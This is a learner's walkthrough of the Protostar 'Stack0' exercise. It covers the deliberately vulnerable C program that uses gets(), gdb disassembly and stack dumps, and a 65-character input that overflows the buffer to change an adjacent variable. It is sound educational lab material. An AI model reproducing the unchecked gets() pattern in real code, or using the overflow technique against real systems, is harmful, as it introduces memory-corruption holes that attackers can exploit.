Getting into Buffer Overflows
Protostar Exploit Learning
A while ago, I started (again) to play around with buffer overflows. To get a bit more practice I decided to make the Protostar challenge / exercises.
I will share my workflow and walkthroughs for the levels. Mostly for my own sake, so I can get back to the write-ups if I need them. So, welcome to my buffer overflow journey and have a great time!
Stack0
This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify the program execution.
This is the very first level of protostar. And should give you a good introduction on how to perform buffer overflows in general.
Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
The code is quite simple. We have a buffer
vector and a modified
variable.
Then we use gets()
to read in some data and last but not least it performs a check, whether modified
is not equal to zero.
Now you may think: "But, modified never gets reassigned" and indeed, that is true. But we need to take a look at the gets()
function.
gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte (aq0aq). No check for buffer overrun is performed.
That is the entry of the man page and it does not sound great. It sounds indeed, quite insecure.
GDB
Now it is time for some reversing. As protostar lives in a vm, we gonna use vanilla gdb. Please bear with me, as I am quite new to gdb and don't know all the tricks ;)
Finally, we load in our executable into gdb with gdb /opt/protostar/bin/stack0
Setup
Before we start disassembling I would like to make some settings to gdb.
With set disassembly-flavor intel
we set the asm code flavour to intel, which I prefer.
Then we add a hook.
define hook-stop
info registers
x/24wx $esp
x/2i $eip
end
So every time we hit a breakpoint we get additional information shown.
Reversing
Now we can start disassembling our executable and type:
disassemble main
which results in the following output
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x60
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea eax,[esp+0x1c]
0x08048409 <main+21>: mov DWORD PTR [esp],eax
0x0804840c <main+24>: call 0x804830c <gets@plt>
0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call 0x804832c <puts@plt>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: mov DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call 0x804832c <puts@plt>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
If we compare the disassembly with the provided c code, we can very clearly see what's going on.
For example, here we see that 0x0
gets moved into [esp+0x5c]
which seems very likely to be modified = 0
.
Now we add two breakpoints:
break *0x0804840c
break *0x08048411
The first one is the call to the gets()
function, and the latter is the mov
instruction.
Why are we adding these breakpoints there, you may ask. Simply because we want to see the stack before we enter some input and after we entered some input.
Now its time to run our binary by typing r
and we should see following output:
Starting program: /opt/protostar/bin/stack0 a
eax 0xbffffc7c -1073742724
ecx 0xf0feeff1 -251727887
edx 0x2 2
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x804840c 0x804840c <main+24>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0xb7eada75
0xbffffc80: 0xb7fd7ff4 0x08049620 0xbffffc98 0x080482e8
0xbffffc90: 0xb7ff1040 0x08049620 0xbffffcc8 0x08048469
0xbffffca0: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffcc8
0xbffffcb0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0x804840c <main+24>: call 0x804830c <gets@plt>
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
Because of our hook, which we created earlier, we now see
Registers
eax 0xbffffc7c -1073742724
ecx 0xf0feeff1 -251727887
edx 0x2 2
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x804840c 0x804840c <main+24>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
Stack
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0xb7eada75
0xbffffc80: 0xb7fd7ff4 0x08049620 0xbffffc98 0x080482e8
0xbffffc90: 0xb7ff1040 0x08049620 0xbffffcc8 0x08048469
0xbffffca0: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffcc8
0xbffffcb0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
Next two instructions
0x804840c <main+24>: call 0x804830c <gets@plt>
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
Okay, so our first breakpoint for the gets()
call got hit. And we're hanging there. Now we need to continue by typing c
and we can enter some characters.
(gdb) c
Continuing.
AAAAAAAAAA
And our output will look like this:
eax 0xbffffc7c -1073742724
ecx 0xbffffc7c -1073742724
edx 0xb7fd9334 -1208118476
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x8048411 0x8048411 <main+29>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0x41414141
0xbffffc80: 0x41414141 0x08004141 0xbffffc98 0x080482e8
0xbffffc90: 0xb7ff1040 0x08049620 0xbffffcc8 0x08048469
0xbffffca0: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffcc8
0xbffffcb0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x8048415 <main+33>: test eax,eax
If you now keep a close eye to the stack, you will notice lots of 0x41414141
These are our A 's we input earlier as hex values. Cool.
What am I doing here
Now, you are maybe quite lost. Because, what is our initial goal? Well, the goal is to overwrite the modified
variable. Do you remember the variable initialization? It was mov DWORD PTR [esp+0x5c],0x0
.
So let's examine this address by typing:
x/wx $esp+0x5c
And we see that the value is still 0.
(gdb) x/wx $esp+0x5c
0xbffffcbc: 0x00000000
Now if you take again a look at our stack, the very last value, was also 0x00000000
. What we now try to do, is to enter so many characters that this value gets overwritten.
Let's run it again and continue with a larger string:
(gdb) c
Continuing.
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFF
eax 0xbffffc7c -1073742724
ecx 0xbffffc7c -1073742724
edx 0xb7fd9334 -1208118476
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x8048411 0x8048411 <main+29>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0x41414141
0xbffffc80: 0x41414141 0x42424242 0x42424242 0x43434343
0xbffffc90: 0x43434343 0x44444444 0x44444444 0x45454545
0xbffffca0: 0x45454545 0x46464646 0x46464646 0xbffffc00
0xbffffcb0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x8048415 <main+33>: test eax,eax
Now we can clearly see the pattern here. First, we have two blocks of 0x41414141
which are our AAAAAAAA
, then two blocks of 0x42424242
which are our BBBBBBBB
and so on. Now you can also see why I picked that special string. It is easily recognisable and you can count how many more characters you need to overwrite 0x00000000
.
We have filled up 12 blocks currently à 4 characters. Which result in 48 characters. If we add 4 more blocks, we are at 64 characters and our result will look like this:
(gdb) c
Continuing.
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHH
0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xb7fd7ff4 0xb7ec6165 0xbffffc88 0x41414141
0x41414141 0x42424242 0x42424242 0x43434343
0x43434343 0x44444444 0x44444444 0x45454545
0x45454545 0x46464646 0x46464646 0x47474747
0x47474747 0x48484848 0x48484848 0x00000000
Which makes total sense. Because if you check the source code the buffer
vector is defined with a size of 64.
char buffer[64];
Solution
With that in mind, we can now solve this challenge by simply adding one more character to our string.
(gdb) c
Continuing.
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHI
eax 0xbffffc7c -1073742724
ecx 0xbffffc7c -1073742724
edx 0xb7fd9334 -1208118476
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x8048411 0x8048411 <main+29>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0x41414141
0xbffffc80: 0x41414141 0x42424242 0x42424242 0x43434343
0xbffffc90: 0x43434343 0x44444444 0x44444444 0x45454545
0xbffffca0: 0x45454545 0x46464646 0x46464646 0x47474747
0xbffffcb0: 0x47474747 0x48484848 0x48484848 0x00000049
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x8048415 <main+33>: test eax,eax
Breakpoint 4, main (argc=2, argv=0xbffffd74) at stack0/stack0.c:13
13 in stack0/stack0.c
If we examine the address of our modified
variable with
x/wx $esp+0x5c
0xbffffcbc: 0x00000049
We see that it's value has changed. And is no longer 0.
Now we can continue to run the program and getting our desired output.
(gdb) c
Continuing.
you have changed the 'modified' variable
Program exited with code 051.
Error while running hook_stop:
The program has no registers now.